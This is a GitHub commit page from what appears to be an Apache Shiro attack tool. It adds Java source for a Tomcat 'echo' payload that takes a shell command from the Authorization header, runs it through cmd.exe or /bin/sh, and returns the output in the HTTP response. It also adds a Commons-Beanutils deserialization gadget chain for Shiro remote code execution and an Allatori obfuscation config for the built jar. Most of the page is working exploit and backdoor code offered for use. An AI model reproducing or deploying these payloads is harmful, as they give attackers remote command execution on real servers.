-
Notifications
You must be signed in to change notification settings - Fork 250
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
17 changed files
with
537 additions
and
4 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
128 changes: 128 additions & 0 deletions
128
src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,128 @@ | ||
package com.summersec.attack.deser.echo; | ||
|
||
import javassist.*; | ||
|
||
import java.io.IOException; | ||
|
||
/** | ||
* @ClassName: TomcatEcho2 | ||
* @Description: TODO | ||
* @Author: Summer | ||
* @Date: 2022/1/19 11:33 | ||
* @Version: v1.0.0 | ||
* @Description: | ||
**/ | ||
public class TomcatEcho2 implements EchoPayload{ | ||
@Override | ||
public CtClass genPayload(final ClassPool pool) throws CannotCompileException, NotFoundException, IOException { | ||
final CtClass clazz = pool.makeClass("com.summersec.x.Test" + System.nanoTime()); | ||
if (clazz.getDeclaredConstructors().length != 0) { | ||
clazz.removeConstructor(clazz.getDeclaredConstructors()[0]); | ||
} | ||
|
||
|
||
|
||
clazz.addMethod(CtMethod.make(" private static void writeBody(Object var0, byte[] var1) throws Exception {\n" + | ||
" byte[] bs = (\"$$$\" + org.apache.shiro.codec.Base64.encodeToString(var1) + \"$$$\").getBytes();\n" + | ||
" Object var2;\n" + | ||
" Class var3;\n" + | ||
" try {\n" + | ||
" var3 = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n" + | ||
" var2 = var3.newInstance();\n" + | ||
" var3.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)});\n" + | ||
" var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" + | ||
" } catch (Exception var5) {\n" + | ||
" var3 = Class.forName(\"java.nio.ByteBuffer\");\n" + | ||
" var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n" + | ||
" var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" + | ||
" } \n" + | ||
" }",clazz)); | ||
|
||
clazz.addMethod(CtMethod.make(" private static Object getFV(Object var0, String var1) throws Exception {\n" + | ||
" java.lang.reflect.Field var2 = null;\n" + | ||
" Class var3 = var0.getClass();\n" + | ||
"\n" + | ||
" while(var3 != Object.class) {\n" + | ||
" try {\n" + | ||
" var2 = var3.getDeclaredField(var1);\n" + | ||
" break;\n" + | ||
" } catch (NoSuchFieldException var5) {\n" + | ||
" var3 = var3.getSuperclass();\n" + | ||
" }\n" + | ||
" }\n" + | ||
"\n" + | ||
" if (var2 == null) {\n" + | ||
" throw new NoSuchFieldException(var1);\n" + | ||
" } else {\n" + | ||
" var2.setAccessible(true);\n" + | ||
" return var2.get(var0);\n" + | ||
" }\n" + | ||
" }", clazz)); | ||
clazz.addConstructor(CtNewConstructor.make("public TomcatEcho() throws Exception {\n" + | ||
" boolean var4 = false;\n" + | ||
" Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n" + | ||
" for (int var6 = 0; var6 < var5.length; ++var6) {\n" + | ||
" Thread var7 = var5[var6];\n" + | ||
" if (var7 != null) {\n" + | ||
" String var3 = var7.getName();\n" + | ||
" if (!var3.contains(\"exec\") && var3.contains(\"http\")) {\n" + | ||
" Object var1 = getFV(var7, \"target\");\n" + | ||
" if (var1 instanceof Runnable) {\n" + | ||
" try {\n" + | ||
" var1 = getFV(getFV(getFV(var1, \"this$0\"), \"handler\"), \"global\");\n" + | ||
" } catch (Exception var13) {\n" + | ||
" continue;\n" + | ||
" }\n" + | ||
" java.util.List var9 = (java.util.List) getFV(var1, \"processors\");\n" + | ||
"\n" + | ||
" for(int var10 = 0; var10 < var9.size(); ++var10) {\n" + | ||
" Object var11 = var9.get(var10);\n" + | ||
" var1 = getFV(var11, \"req\");\n" + | ||
" Object var2 = var1.getClass().getMethod(\"getResponse\",new Class[0]).invoke(var1, new Object[0]);\n" + | ||
" try {\n" + | ||
"\n" + | ||
"\n" + | ||
" var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Host\")});\n" + | ||
" if (var3 != null && !var3.isEmpty()) {\n" + | ||
" var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n" + | ||
" var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Host\"), var3});\n" + | ||
" var4 = true;\n" + | ||
" }\n" + | ||
"\n" + | ||
" var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Authorization\")});\n" + | ||
" if (var3 != null && !var3.isEmpty()) {\n" + | ||
" var3 = org.apache.shiro.codec.Base64.decodeToString(var3.replaceAll(\"Basic \", \"\"));\n" + | ||
" String[] var12 = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", var3} : new String[]{\"/bin/sh\", \"-c\", var3};\n" + | ||
" writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter(\"\\\\A\").next().getBytes());\n" + | ||
" var4 = true;\n" + | ||
" }\n" + | ||
"\n" + | ||
" if (var4) {\n" + | ||
" break;\n" + | ||
" }\n" + | ||
" }catch (Exception var14) {\n" + | ||
" writeBody(var2, var14.getMessage().getBytes());\n" + | ||
" }\n" + | ||
" }\n" + | ||
"\n" + | ||
" if (var4) {\n" + | ||
" break;\n" + | ||
" }\n" + | ||
" }\n" + | ||
" }\n" + | ||
" }\n" + | ||
" }\n" + | ||
" }",clazz)); | ||
|
||
return clazz; | ||
} | ||
|
||
|
||
public static void main(String[] args) throws NotFoundException, CannotCompileException, IOException { | ||
ClassPool pool = ClassPool.getDefault(); | ||
// TomcatEcho2 tomcatEcho2 = new TomcatEcho2(); | ||
SpringEcho springEcho = new SpringEcho(); | ||
springEcho.genPayload(pool); | ||
// tomcatEcho2.genPayload(pool); | ||
} | ||
} |
57 changes: 57 additions & 0 deletions
57
src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsString_192s.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,57 @@ | ||
package com.summersec.attack.deser.payloads; | ||
|
||
import com.summersec.attack.deser.payloads.annotation.Authors; | ||
import com.summersec.attack.deser.payloads.annotation.Dependencies; | ||
import com.summersec.attack.deser.util.JavassistClassLoader; | ||
import com.summersec.attack.deser.util.Reflections; | ||
import java.util.Comparator; | ||
import java.util.PriorityQueue; | ||
import java.util.Queue; | ||
|
||
import com.summersec.attack.deser.util.StandardExecutorClassLoader; | ||
import javassist.ClassClassPath; | ||
import javassist.ClassPool; | ||
import javassist.CtClass; | ||
import javassist.CtField; | ||
|
||
|
||
@Dependencies({"commons-beanutils:commons-beanutils:1.6.1"}) | ||
@Authors({"phith0n"}) | ||
public class CommonsBeanutilsString_192s implements ObjectPayload<Queue<Object>> { | ||
@Override | ||
public Queue<Object> getObject(Object template) throws Exception { | ||
|
||
ClassPool pool = ClassPool.getDefault(); | ||
pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator"))); | ||
final CtClass beanComparator = pool.get("org.apache.commons.beanutils.BeanComparator"); | ||
|
||
try { | ||
CtField ctSUID = beanComparator.getDeclaredField("serialVersionUID"); | ||
beanComparator.removeField(ctSUID); | ||
}catch (javassist.NotFoundException e){} | ||
beanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", beanComparator)); | ||
// mock method name until armed | ||
final Comparator comparator = (Comparator)beanComparator.toClass(new JavassistClassLoader()).newInstance(); | ||
beanComparator.defrost(); | ||
|
||
PriorityQueue<String> queue = new PriorityQueue(2, (Comparator<?>)comparator); | ||
|
||
queue.add("1"); | ||
queue.add("1"); | ||
|
||
Reflections.setFieldValue(queue, "queue", new Object[] { template, template }); | ||
|
||
Reflections.setFieldValue(beanComparator, "property", "outputProperties"); | ||
|
||
return (Queue)queue; | ||
} | ||
|
||
public static void main(String[] args) throws Exception { | ||
CommonsBeanutilsString_192s commonsBeanutilsString192 = new CommonsBeanutilsString_192s(); | ||
commonsBeanutilsString192.getObject(new Object()); | ||
|
||
} | ||
} | ||
|
||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
15 changes: 15 additions & 0 deletions
15
src/main/java/com/summersec/attack/deser/util/JavassistClassLoader.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,15 @@ | ||
package com.summersec.attack.deser.util; | ||
|
||
/** | ||
* @ClassName: JavassistClassLoader | ||
* @Description: TODO | ||
* @Author: Summer | ||
* @Date: 2022/1/24 16:34 | ||
* @Version: v1.0.0 | ||
* @Description: | ||
**/ | ||
public class JavassistClassLoader extends ClassLoader { | ||
public JavassistClassLoader(){ | ||
super(Thread.currentThread().getContextClassLoader()); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,34 @@ | ||
<!--allatori配置文件--> | ||
<config> | ||
<!-- <!\-\- 输入和输出jar配置,out指向的是加密后的jar –>--> | ||
<input> | ||
<!-- <jar in="shiro_attack-4.3-SNAPSHOT.jar" out="obf-shiro_attack-4.3-SNAPSHOT.jar"/>--> | ||
<jar in="shiro_attack-4.4-SNAPSHOT-all.jar" out="obf-shiro_attack-4.4-SNAPSHOT-all.jar"/> | ||
</input> | ||
<!-- <!\-\- 加水印 –>--> | ||
<watermark key="shiro_attack" value="developer: SummerSec"/> | ||
<!-- <!\-\- 需要保留原来类名的配置 –>--> | ||
<keep-names> | ||
<class access="protected+"> | ||
<field access="protected+"/> | ||
<method access="protected+"/> | ||
</class> | ||
<class template="class com.xxx.xxx.*"/> | ||
|
||
</keep-names> | ||
|
||
<property name="log-file" value="log.xml"/> | ||
<ignore-classes> | ||
<class template="class \*springframework\*"/> | ||
<class template="class \*shardingjdbc\*"/> | ||
<class template="class \*jni\*"/> | ||
<class template="class \*alibaba\*"/> | ||
<class template="class \*persistence\*"/> | ||
<class template="class \*apache\*"/> | ||
<class template="class \*mybatis\*"/> | ||
<!-- <!\-\- 排除包下的类,可单个到具体,注意此处一定要排除掉springboot项目的启动类 –>--> | ||
<class template="class com.apache.*"/> | ||
<class template="class org.apache.http.entity.StringEntity"/> | ||
<class template="class org.apache.cxf.*"/> | ||
</ignore-classes> | ||
</config> |
Oops, something went wrong.